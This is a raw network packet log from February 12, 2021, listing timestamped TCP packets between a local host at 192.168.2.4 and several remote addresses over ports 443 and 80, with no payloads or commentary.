Feb 12, 2021 01:47:08.052789927 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.052831888 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.052932024 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.056138992 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.056180000 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.056224108 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.056251049 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.058618069 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.058660984 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.058693886 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.058697939 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.058708906 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.058763027 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.058778048 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.058820009 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.058876991 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.058891058 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.058922052 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.058927059 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.058989048 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.059000969 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.059042931 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.059053898 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.059098005 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.059111118 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.059151888 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.059165955 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.059204102 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.059279919 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.059320927 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.059334040 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.059371948 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.059431076 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.059480906 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.065181971 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.065237045 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.065295935 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.065452099 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.065491915 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.065527916 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.065551043 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.065557003 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.066497087 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.066540956 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.066584110 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.066607952 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.067464113 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.067568064 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.067595005 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.067660093 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.068459988 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.068502903 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.068531036 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.068556070 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.069403887 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.069456100 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.069470882 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.069504976 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.070306063 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.070348978 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.070367098 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.070395947 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.071280956 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.071356058 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.074907064 CET	443	49735	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.075517893 CET	443	49738	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.083651066 CET	443	49734	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.092327118 CET	443	49736	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.094036102 CET	443	49739	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.102297068 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.102349043 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.102391005 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.102428913 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.102433920 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.102468014 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.102471113 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.102492094 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.102508068 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.102530956 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.102547884 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.102562904 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.102596998 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.102612972 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.102660894 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.110588074 CET	443	49732	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.112175941 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.112230062 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.112268925 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.112270117 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.112287045 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.112313032 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.112328053 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.112369061 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.114631891 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.114691973 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.114703894 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.114741087 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.114758015 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.114784956 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.114800930 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.114825010 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.114846945 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.114866972 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.114885092 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.114907026 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.114923000 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.114948034 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.114953995 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.114989996 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115004063 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115030050 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115036964 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115078926 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115082979 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115133047 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115171909 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115214109 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115220070 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115255117 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115264893 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115294933 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115312099 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115343094 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115364075 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115412951 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115420103 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115469933 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115484953 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115525961 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115535021 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115576029 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115639925 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115689993 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115693092 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115744114 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115763903 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115806103 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115818024 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115845919 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115853071 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115885019 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115897894 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.115971088 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.115994930 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.116014004 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.116019011 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.116070032 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.116131067 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.116183043 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.158536911 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.158588886 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.158620119 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.158626080 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.158657074 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.158663988 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.158677101 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.158720016 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.158720970 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.158761978 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.158776999 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.158803940 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.158807039 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.158844948 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.158852100 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.158883095 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.158886909 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.158922911 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.158931971 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.158962965 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.158967018 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.159003973 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.159010887 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.159055948 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.159110069 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.159152031 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.159157991 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.159190893 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.159209967 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.159229994 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.159235001 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.159271002 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.168302059 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.168349981 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.168390036 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.168395042 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.168411970 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.168447018 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.168462992 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.168487072 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.168489933 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.168534040 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.168534994 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.168577909 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.168581009 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.168626070 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.168719053 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.168761969 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171022892 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171080112 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171108961 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171122074 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171133041 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171163082 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171179056 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171202898 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171205044 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171242952 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171247005 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171283007 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171283960 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171325922 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171331882 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171420097 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171451092 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171458960 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171502113 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171513081 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171541929 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171582937 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171636105 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171638966 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171680927 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171698093 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171745062 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171786070 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171825886 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171857119 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171879053 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171895027 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171936035 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.171950102 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.171988964 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.172002077 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.172050953 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.172055960 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.172111988 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.172123909 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.172164917 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.172178984 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.172219992 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.172276974 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.172322989 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.172326088 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.172374010 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.172403097 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.172444105 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.172463894 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.172489882 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.172509909 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.172550917 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.172559023 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.172609091 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.172656059 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.172697067 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.172719002 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.172753096 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.172810078 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.172844887 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.172874928 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.172889948 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:48:00.689497948 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:00.690140963 CET	49763	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:00.763828993 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:00.764050961 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:00.766551018 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:00.767433882 CET	80	49763	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:00.767585039 CET	49763	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:00.883924961 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.264964104 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.265038967 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.265100956 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.265120983 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.265156984 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.265161037 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.265183926 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.265217066 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.265237093 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.265271902 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.265288115 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.265341997 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.304090977 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.304143906 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.304182053 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.304214001 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.304224968 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.304254055 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.304260015 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.304292917 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.339406967 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.339457035 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.339490891 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.339529037 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.339566946 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.339589119 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.339615107 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.339643955 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.339683056 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.343245983 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.343348980 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.343461037 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.343519926 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.345487118 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.345633030 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.380770922 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.380805016 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.380827904 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.380851030 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.380873919 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.380894899 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.380904913 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.380978107 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.380985022 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.380990028 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.381176949 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.381233931 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.381261110 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.381381035 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.420459032 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.420515060 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.420569897 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.420574903 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.420614004 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.420633078 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.420636892 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.420697927 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.420697927 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.420746088 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.420757055 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.420804024 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.420804024 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.420856953 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.420857906 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.420902014 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.420918941 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.420953035 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.420959949 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.421001911 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.421010017 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.421051025 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.421062946 CET	49762	80	192.168.2.4	35.228.31.40
